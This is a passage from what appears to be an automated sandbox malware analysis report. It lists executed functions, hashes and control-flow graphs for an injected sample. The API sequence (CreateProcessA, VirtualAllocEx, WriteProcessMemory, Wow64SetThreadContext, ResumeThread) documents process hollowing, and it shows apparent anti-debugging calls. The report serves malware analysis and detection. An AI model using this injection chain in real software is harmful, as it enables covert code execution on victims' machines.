10628 5f475f 10629->10628 10631 5f2a04 ReadProcessMemory 10630->10631 10633 5f2a82 10631->10633 10633->10575 10635 5f2a04 ReadProcessMemory 10634->10635 10637 5f2a82 10635->10637 10637->10575 10639 5f28a4 WriteProcessMemory 10638->10639 10641 5f2943 10639->10641 10641->10580 10643 5f2858 WriteProcessMemory 10642->10643 10645 5f2943 10643->10645 10645->10580 10647 5f2c77 CreateProcessA 10646->10647 10649 5f2ed5 10647->10649 10651 5f2211 Wow64SetThreadContext 10650->10651 10653 5f228f 10651->10653 10653->10597 10655 5f2211 Wow64SetThreadContext 10654->10655 10657 5f228f 10655->10657 10657->10597 10659 5f233c VirtualAllocEx 10658->10659 10661 5f23ba 10659->10661 10661->10604 10663 5f233c VirtualAllocEx 10662->10663 10665 5f23ba 10663->10665 10665->10604 10667 5f211c ResumeThread 10666->10667 10669 5f216e 10667->10669 10670 1b49b8 10671 1b49c4 10670->10671 10674 1b7768 10671->10674 10672 1b49d5 10675 1b7794 10674->10675 10678 1b86b0 10675->10678 10676 1b783e 10676->10672 10679 1b86c2 10678->10679 10682 1b86e2 10679->10682 10683 1b870a 10682->10683 10686 1b87c0 10683->10686 10687 1b87e4 10686->10687 10690 1b4924 10687->10690 10691 1b8920 NtQueryInformationProcess 10690->10691 10693 1b86d6 10691->10693 10693->10676 10694 1b90d2 10696 1b900c 10694->10696 10698 1b8b40 10696->10698 10702 1b8b4c 10696->10702 10699 1b98c0 OutputDebugStringW 10698->10699 10701 1b9972 10699->10701 10701->10696 10703 1b99b8 CloseHandle 10702->10703 10705 1b9a4e 10703->10705 10705->10696 10706 1b8f50 10708 1b8f74 10706->10708 10707 1b8b40 OutputDebugStringW 10707->10708 10708->10707 10709 1b8b4c CloseHandle 10708->10709 10709->10708

                                                                                                            Executed Functions

                                                                                                            Function 001B4924 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1265 1b4924-1b89eb NtQueryInformationProcess 1268 1b89ed-1b89f3 1265->1268 1269 1b89f4-1b8a2a 1265->1269 1268->1269
                                                                                                            APIs
                                                                                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 001B89D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationProcessQuery
                                                                                                            • String ID:
                                                                                                            • API String ID: 1778838933-0
                                                                                                            • Opcode ID: c8194ea786ed844921176a608400125a35a5a9ba8333247e6ef7e415ab415fb2
                                                                                                            • Instruction ID: 4ce6fa1f85721822abbec706cfb0013474a639c65ccae71822af654628f188c5
                                                                                                            • Opcode Fuzzy Hash: c8194ea786ed844921176a608400125a35a5a9ba8333247e6ef7e415ab415fb2
                                                                                                            • Instruction Fuzzy Hash: 1F4176B8D04258DFCF10CFA9D984ADEFBB5BB49314F20902AE914B7210D735A915CFA9
                                                                                                            Function 001B5CA9 Relevance: .5, Instructions: 511COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3b26d7f7f5768022d6ccc68f39020986254784e95819b23ab08f54fcc93ea887
                                                                                                            • Instruction ID: 28b886702c49f7f4e15f8c932170be7042d2e857feb518aa7e3a8d594d0a5f74
                                                                                                            • Opcode Fuzzy Hash: 3b26d7f7f5768022d6ccc68f39020986254784e95819b23ab08f54fcc93ea887
                                                                                                            • Instruction Fuzzy Hash: 0E427074E01229CFDB64CFA9C984B9DBBF2BF88310F1581A9D819A7355D734AA81CF50
                                                                                                            Function 001B497B Relevance: .5, Instructions: 498COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3fdd3478ebd2a6dad16b43e93f70ee3e7fc8bb2ac2d178acaa79fc087bf49ad6
                                                                                                            • Instruction ID: 8eac2b46d23224cfe80222b8b124e3ce80d4b233cbe26748f40ee8d3aa999d69
                                                                                                            • Opcode Fuzzy Hash: 3fdd3478ebd2a6dad16b43e93f70ee3e7fc8bb2ac2d178acaa79fc087bf49ad6
                                                                                                            • Instruction Fuzzy Hash: 0632E370901298CFEB54DFA8C680A9DFBB2BF88311F55C599D448AB212CB30DD85CFA0
                                                                                                            Function 001BA298 Relevance: .1, Instructions: 140COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48c9f6ec903fb4e0a911e99bb8f86c638e603dce8cb535fcbb37878042af33ad
                                                                                                            • Instruction ID: 0e5ef5e2fb871c2d3422c3154d814e05911938b118a308f5bb3439ef06f3b84e
                                                                                                            • Opcode Fuzzy Hash: 48c9f6ec903fb4e0a911e99bb8f86c638e603dce8cb535fcbb37878042af33ad
                                                                                                            • Instruction Fuzzy Hash: 0A519F75D016199FDB08DFEAC8546EEFBF2FF88300F14802AE419AB254DB745A46CB41
                                                                                                            Function 005F4310 Relevance: .1, Instructions: 134COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 347299671a7b76b1fa431cef14f6d1f0306509aca95a668b22146ebbb421ed47
                                                                                                            • Instruction ID: 5d90a6d13fc2faad8b990a008b648eb76841b7875a0984a8b9486ac05b370e6c
                                                                                                            • Opcode Fuzzy Hash: 347299671a7b76b1fa431cef14f6d1f0306509aca95a668b22146ebbb421ed47
                                                                                                            • Instruction Fuzzy Hash: 2B510971D05629CBEB28CF66C8047EABBB6BFC9300F14C5AAC50DA6254EB744A85CF40
                                                                                                            Function 001BD6E0 Relevance: .1, Instructions: 132COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 49e579e431a5fb45d8d01af9c702abddaa1fa653e8ac37f05187656290f37272
                                                                                                            • Instruction ID: 1909d24b8c9bab9b1af20d87735ae3e9eb776a34ebe2a1242c54e43492973222
                                                                                                            • Opcode Fuzzy Hash: 49e579e431a5fb45d8d01af9c702abddaa1fa653e8ac37f05187656290f37272
                                                                                                            • Instruction Fuzzy Hash: BD412874E092188FDB0CCFAAE540AEEBBF6AF8D305F25D06AD419A7251EB344941DB50
                                                                                                            Function 001B49D9 Relevance: .1, Instructions: 109COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b3dbbd5bf7ea200b669f05f4d049c6753582804ef8baa52c96dc36a574f38622
                                                                                                            • Instruction ID: b08a7661604db14ac46dcf3430edb283677f385a84c6f429705c918d7c06ce3d
                                                                                                            • Opcode Fuzzy Hash: b3dbbd5bf7ea200b669f05f4d049c6753582804ef8baa52c96dc36a574f38622
                                                                                                            • Instruction Fuzzy Hash: 7241E770E006188FEB58DF6A88517DEBBB2BF89300F14C0BAD45DA7255DB304A858F51
                                                                                                            Function 001BA28A Relevance: .1, Instructions: 102COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2975625299417764b9e7f41493e802a11d49f5e3c687bc47b929ae0f25e70957
                                                                                                            • Instruction ID: c5a8238cbc5e90a9aa7f7aa7fdbddd0deea9fb949505ea4b89528124672152b1
                                                                                                            • Opcode Fuzzy Hash: 2975625299417764b9e7f41493e802a11d49f5e3c687bc47b929ae0f25e70957
                                                                                                            • Instruction Fuzzy Hash: E641C271E006589FDB08DFAAC8946EEFBF2AF89300F14C06AD418AB365DB345946CF41
                                                                                                            Function 001BDE28 Relevance: .1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d768b3e71fe9e0f46efca2c6f13d76a3d2e0eeebea74d9f79e24f9ff6c0e3838
                                                                                                            • Instruction ID: 1ed0bbaa321a0b95b7e9a651145fc174e6c4f58546fd08d8f4a4e6e2444bc752
                                                                                                            • Opcode Fuzzy Hash: d768b3e71fe9e0f46efca2c6f13d76a3d2e0eeebea74d9f79e24f9ff6c0e3838
                                                                                                            • Instruction Fuzzy Hash: 6A21E4B0D056188BEB1CCFABD8547EEFAF6AFC9300F14C02AD50976264EB7419468F90
                                                                                                            Function 005F2BF0 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1160 5f2bf0-5f2c89 1162 5f2c8b-5f2ca2 1160->1162 1163 5f2cd2-5f2cfa 1160->1163 1162->1163 1168 5f2ca4-5f2ca9 1162->1168 1166 5f2cfc-5f2d10 1163->1166 1167 5f2d40-5f2d96 1163->1167 1166->1167 1178 5f2d12-5f2d17 1166->1178 1176 5f2ddc-5f2ed3 CreateProcessA 1167->1176 1177 5f2d98-5f2dac 1167->1177 1169 5f2ccc-5f2ccf 1168->1169 1170 5f2cab-5f2cb5 1168->1170 1169->1163 1173 5f2cb9-5f2cc8 1170->1173 1174 5f2cb7 1170->1174 1173->1173 1175 5f2cca 1173->1175 1174->1173 1175->1169 1196 5f2edc-5f2fc1 1176->1196 1197 5f2ed5-5f2edb 1176->1197 1177->1176 1185 5f2dae-5f2db3 1177->1185 1179 5f2d3a-5f2d3d 1178->1179 1180 5f2d19-5f2d23 1178->1180 1179->1167 1182 5f2d27-5f2d36 1180->1182 1183 5f2d25 1180->1183 1182->1182 1186 5f2d38 1182->1186 1183->1182 1187 5f2dd6-5f2dd9 1185->1187 1188 5f2db5-5f2dbf 1185->1188 1186->1179 1187->1176 1190 5f2dc3-5f2dd2 1188->1190 1191 5f2dc1 1188->1191 1190->1190 1193 5f2dd4 1190->1193 1191->1190 1193->1187 1209 5f2fc3-5f2fc7 1196->1209 1210 5f2fd1-5f2fd5 1196->1210 1197->1196 1209->1210 1213 5f2fc9 1209->1213 1211 5f2fd7-5f2fdb 1210->1211 1212 5f2fe5-5f2fe9 1210->1212 1211->1212 1214 5f2fdd 1211->1214 1215 5f2feb-5f2fef 1212->1215 1216 5f2ff9-5f2ffd 1212->1216 1213->1210 1214->1212 1215->1216 1217 5f2ff1 1215->1217 1218 5f2fff-5f3028 1216->1218 1219 5f3033-5f303e 1216->1219 1217->1216 1218->1219 1222 5f303f 1219->1222 1222->1222
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 005F2EB7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: f90601068d0af6fc49427a271c79da689cc85493fe4df2034b18c36da87a6652
                                                                                                            • Instruction ID: aeb7530591a25907e79a79a3158135263770351e810d907df90fc576607a0b82
                                                                                                            • Opcode Fuzzy Hash: f90601068d0af6fc49427a271c79da689cc85493fe4df2034b18c36da87a6652
                                                                                                            • Instruction Fuzzy Hash: 28C106B1D0022D8FDB25CFA4C845BEEBBB1BF49300F1095A9E519B7240DB789A85CF95
                                                                                                            Function 005F2851 Relevance: 1.6, APIs: 1, Instructions: 120injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1224 5f2851-5f28c3 1227 5f28da-5f2941 WriteProcessMemory 1224->1227 1228 5f28c5-5f28d7 1224->1228 1230 5f294a-5f299c 1227->1230 1231 5f2943-5f2949 1227->1231 1228->1227 1231->1230
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 005F292B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 79dddf5499127592699b7954feeea9ef63dcde09fcb1f380218452c1e52507c0
                                                                                                            • Instruction ID: faf95ab5c3ddab9387a9b701cf09f2bf22055d17568f19b5fd5b575551012903
                                                                                                            • Opcode Fuzzy Hash: 79dddf5499127592699b7954feeea9ef63dcde09fcb1f380218452c1e52507c0
                                                                                                            • Instruction Fuzzy Hash: B541BDB4D012089FCF00CFA9D984AEEBBF1BB49310F20942AE814B7250D375A945CF64
                                                                                                            Function 005F2858 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1236 5f2858-5f28c3 1238 5f28da-5f2941 WriteProcessMemory 1236->1238 1239 5f28c5-5f28d7 1236->1239 1241 5f294a-5f299c 1238->1241 1242 5f2943-5f2949 1238->1242 1239->1238 1242->1241
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 005F292B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 7117c854ec6aa2d4cbfc89b91708f156c672ea2dff1b90800fa8536b410b8187
                                                                                                            • Instruction ID: 25a61c712f6acd6c325cd59213daec710e1e7da7b1b13a2bdda3fb56f498fccd
                                                                                                            • Opcode Fuzzy Hash: 7117c854ec6aa2d4cbfc89b91708f156c672ea2dff1b90800fa8536b410b8187
                                                                                                            • Instruction Fuzzy Hash: 51419EB4D012589FDF00CFA9D584AEEFBF1BB49310F24942AE914B7250D375A945CF64
                                                                                                            Function 005F29B0 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1247 5f29b0-5f2a80 ReadProcessMemory 1250 5f2a89-5f2adb 1247->1250 1251 5f2a82-5f2a88 1247->1251 1251->1250
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 005F2A6A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: be958b0755f8919945322bc0c2ab403a90823e373800f3e509abe610ad0fc60c
                                                                                                            • Instruction ID: 3ce6fda8fe7aa3d9cc53853d6c56f207dc29e8f351a3267487e688b8e4c89fb3
                                                                                                            • Opcode Fuzzy Hash: be958b0755f8919945322bc0c2ab403a90823e373800f3e509abe610ad0fc60c
                                                                                                            • Instruction Fuzzy Hash: D641A8B9D002589FCF10CFA9D884AEEFBB1BB49310F24942AE815B7210D379A945CF65
                                                                                                            Function 005F29B8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1256 5f29b8-5f2a80 ReadProcessMemory 1259 5f2a89-5f2adb 1256->1259 1260 5f2a82-5f2a88 1256->1260 1260->1259
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 005F2A6A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 7595201bf1bdeab0459506d15e6f5a9673cbc2b74ee2f88b816b34ca3144be1e
                                                                                                            • Instruction ID: ac15c4a6a6648761515572bba286184ecdaa1f08131883295f09fecc18956ec7
                                                                                                            • Opcode Fuzzy Hash: 7595201bf1bdeab0459506d15e6f5a9673cbc2b74ee2f88b816b34ca3144be1e
                                                                                                            • Instruction Fuzzy Hash: BB41BAB4D00258DFCF10CFA9D884AEEFBB1BB49310F24942AE814B7200D779A945CF65
                                                                                                            Function 005F22F0 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1272 5f22f0-5f23b8 VirtualAllocEx 1275 5f23ba-5f23c0 1272->1275 1276 5f23c1-5f240b 1272->1276 1275->1276
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 005F23A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 9a3447d381adde63b1ac524687729d77557ce254994f1c36b9935aa2e572dc21
                                                                                                            • Instruction ID: 9c8b2d48879a38a0fc5fef5e075a07a0c4f8a2bbecb14e33190b888470597568
                                                                                                            • Opcode Fuzzy Hash: 9a3447d381adde63b1ac524687729d77557ce254994f1c36b9935aa2e572dc21
                                                                                                            • Instruction Fuzzy Hash: 7541ACB8D002589FCF14CFA9D984AEEFBB1BF49310F20942AE915B7250D335A905DF55
                                                                                                            Function 005F22F8 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1281 5f22f8-5f23b8 VirtualAllocEx 1284 5f23ba-5f23c0 1281->1284 1285 5f23c1-5f240b 1281->1285 1284->1285
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 005F23A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: f2e89da25ebbc02889a1d9a0b93fcf063f33677626853cb5737e71fa685a0a2b
                                                                                                            • Instruction ID: e201efb0ca58c42414c9f383fb95f11995473bfc690659821179f8c75b1b06a8
                                                                                                            • Opcode Fuzzy Hash: f2e89da25ebbc02889a1d9a0b93fcf063f33677626853cb5737e71fa685a0a2b
                                                                                                            • Instruction Fuzzy Hash: 24419AB4D002589FCF14CFA9D984AEEBBB1FB49310F20942AE914BB250D735A905DF65
                                                                                                            Function 005F21C1 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1290 5f21c1-5f2228 1292 5f223f-5f228d Wow64SetThreadContext 1290->1292 1293 5f222a-5f223c 1290->1293 1295 5f228f-5f2295 1292->1295 1296 5f2296-5f22e2 1292->1296 1293->1292 1295->1296
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 005F2277
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 723ba7735dc6c398782d08ad29881cca0fcedbaeb8eef80753a4d3d1bac57886
                                                                                                            • Instruction ID: 8f8071ef66333c9591a75c00b3de1143a87d4da515f35813ca0140d5453d0d28
                                                                                                            • Opcode Fuzzy Hash: 723ba7735dc6c398782d08ad29881cca0fcedbaeb8eef80753a4d3d1bac57886
                                                                                                            • Instruction Fuzzy Hash: D141BAB4D00258DFDB10CFA9D884AEEBBF1BB49314F24842AE818B7240C738A945CF54
                                                                                                            Function 005F21C8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1301 5f21c8-5f2228 1303 5f223f-5f228d Wow64SetThreadContext 1301->1303 1304 5f222a-5f223c 1301->1304 1306 5f228f-5f2295 1303->1306 1307 5f2296-5f22e2 1303->1307 1304->1303 1306->1307
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 005F2277
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414371502.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_5f0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 56775b863e6d7da1853919a01b46a499a2ac1e5730da51cde2e8b1867be34a59
                                                                                                            • Instruction ID: 537ffdfdc0c1e3de5c34278976696858610184586f7fca84ca9de0d40d44797f
                                                                                                            • Opcode Fuzzy Hash: 56775b863e6d7da1853919a01b46a499a2ac1e5730da51cde2e8b1867be34a59
                                                                                                            • Instruction Fuzzy Hash: E741ACB4D00258DFDB10DFAAD884AEEBBF1BB49314F24842AE418B7240D739A945CF64
                                                                                                            Function 001B8B40 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1312 1b8b40-1b9919 1315 1b991b-1b992a 1312->1315 1316 1b992d-1b9970 OutputDebugStringW 1312->1316 1315->1316 1317 1b9979-1b99a7 1316->1317 1318 1b9972-1b9978 1316->1318 1318->1317
                                                                                                            APIs
                                                                                                            • OutputDebugStringW.KERNEL32(?), ref: 001B995A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DebugOutputString
                                                                                                            • String ID:
                                                                                                            • API String ID: 1166629820-0
                                                                                                            • Opcode ID: 08c2bf38a0763ba9bd9458795e45b05f126371d64dc828cf59de9bbe7c1ecbda
                                                                                                            • Instruction ID: 3f32a0bb0d98c2c4a9cd4296ee0bf0eda5856a959c517ae7e7be7b7800b997b9
                                                                                                            • Opcode Fuzzy Hash: 08c2bf38a0763ba9bd9458795e45b05f126371d64dc828cf59de9bbe7c1ecbda
                                                                                                            • Instruction Fuzzy Hash: D6319BB4D002199FCB14CFA9D584AEEFBF1AB49314F24906AE918B7310D334A946CFA5
                                                                                                            Function 001B98BA Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1321 1b98ba-1b9919 1323 1b991b-1b992a 1321->1323 1324 1b992d-1b9970 OutputDebugStringW 1321->1324 1323->1324 1325 1b9979-1b99a7 1324->1325 1326 1b9972-1b9978 1324->1326 1326->1325
                                                                                                            APIs
                                                                                                            • OutputDebugStringW.KERNEL32(?), ref: 001B995A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.414074767.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_1b0000_cmnjgyugo61000.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DebugOutputString
                                                                                                            • String ID:
                                                                                                            • API String ID: 1166629820-0
                                                                                                            • Opcode ID: 24cdd0268c58d7e740176371faf591dc9448d850a90c7a680680807b879b4802
                                                                                                            • Instruction ID: a86f869f1ebabf8ff794d336124da6a2831b0d24afc3b9729c9ef278036f6aab
                                                                                                            • Opcode Fuzzy Hash: 24cdd0268c58d7e740176371faf591dc9448d850a90c7a680680807b879b4802
                                                                                                            • Instruction Fuzzy Hash: 4A31BDB4D002499FCF14CFA9D584ADEFBF1AF49304F24806AE819B7210D374A946CFA5
                                                                                                            Function 005F20D8 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1329 5f20d8-5f216c ResumeThread 1332 5f216e-5f2174 1329->1332 1333 5f2175-5f21b7 1329->1333 1332->1333
                                                                                                            APIs
                                                                                                            Memory Dump Source
